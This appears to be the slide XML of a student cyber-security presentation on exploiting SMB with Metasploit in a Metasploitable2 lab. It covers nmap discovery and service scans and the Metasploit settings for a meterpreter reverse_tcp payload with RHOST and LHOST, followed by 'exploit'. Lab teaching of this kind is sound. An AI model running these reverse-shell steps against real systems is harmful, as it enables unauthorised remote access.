              <a:t>Our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> project utilizes the Metasploit framework to demonstrate the exploitation of vulnerabilities in the SMB protocol. The methodology is divided into several key phases: setup of the lab environment, information gathering, vulnerability identification, exploitation, and post-exploitation analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="20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Set the target IP address and other required options.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Example commands in Metasploit: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bash</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Copy code</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set RHOST 192.168.0.101</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set PAYLOAD windows/x64/meterpreter/reverse_tcp</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set LHOST 192.168.0.102</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Executing the Exploit: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Run the exploit to gain access to the target system.</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Example command in Metasploit: exploit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5. Post-Exploitation Analysis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Gaining and Maintaining Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="!!TextBox"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732314" y="389290"/>
            <a:ext cx="3679371" cy="58356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Methodology</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1981167"/>
            <a:ext cx="7620000" cy="1260475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3800" b="1">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System Hacking through SMB Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3345180"/>
            <a:ext cx="5715000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Name of the Students        Roll Numbers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>aniya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thabassum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2H51A62B8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>R.Shiva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Kumar               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3H551A6210</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S.Dheera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Samurchitha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3H551A6213</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387985" y="4896485"/>
            <a:ext cx="5045710" cy="1363980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="64135" lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="68000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Under Esteemed guidance of</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M.L.Saranya</a:t>
            </a:r>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Assistant Professor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CSE — Cyber Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1371600" y="228600"/>
          <a:ext cx="7162800" cy="951198"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7162800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>CMR COLLEGE OF ENGINEERING &amp; TECHNOLOGY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="002060"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9199" marR="9199" marT="6133" marB="6133" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Kandlakoya, Medchal, Hyderabad - 501401</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="002060"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9199" marR="9199" marT="6133" marB="6133" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Department of Computer Science and Engineering-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t> Cyber Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="002060"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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762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6" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251880" y="7467600"/>
            <a:ext cx="8381160" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="-832644"/>
            <a:ext cx="1676400" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Avenir Next" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Avenir Next" panose="020B0503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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="!!TextBox"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732314" y="389290"/>
            <a:ext cx="3679371" cy="58356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Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431380" y="1219200"/>
            <a:ext cx="7975600" cy="5058410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nformation Gathering:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using Nmap for Network Discovery:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Run a network scan to discover the IP address of the Metasploitable2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>machine.Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap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sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 192.168.0.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Service Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Identifying Open Ports and Services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use Nmap to scan the Metasploitable2 machine for open ports and services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 192.168.0.101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Vulnerability Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" alt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SMB Version Detection</a:t>
            </a:r>
            <a:r>
